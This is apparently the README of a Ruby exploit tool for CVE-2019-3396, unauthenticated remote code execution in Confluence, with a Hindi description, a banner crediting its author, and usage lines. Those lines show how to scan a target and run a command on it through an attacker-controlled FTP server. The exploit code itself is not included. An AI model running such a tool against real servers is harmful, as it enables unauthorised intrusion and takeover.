
CVE-2019-3396 के लिए Ruby एक्सप्लॉइट जो बिना प्रमाणीकरण के Confluence रिमोट कोड निष्पादन सक्षम करता है, जिसमें FTP सर्वर के माध्यम से लक्ष्य स्कैनिंग और कमांड निष्पादन शामिल है।

bundle install
┌──(user㉿hostname)-[~/path/to/cve-2019-3396]
└─$ ruby cve-2019-3396.rb
exploit -> CVE-2019-3396
Author -> Abdallah Mohamed Elsharif
Greetz to Ghost5egy and Hamza Abdulrahman and Omar and Alaa
Usage:
ruby cve-2019-3396.rb [options] Or --help
ruby cve-2019-3396.rb -t TARGET --scan
ruby cve-2019-3396.rb -t TARGET --ftp-serv FTPHOST -c COMMAND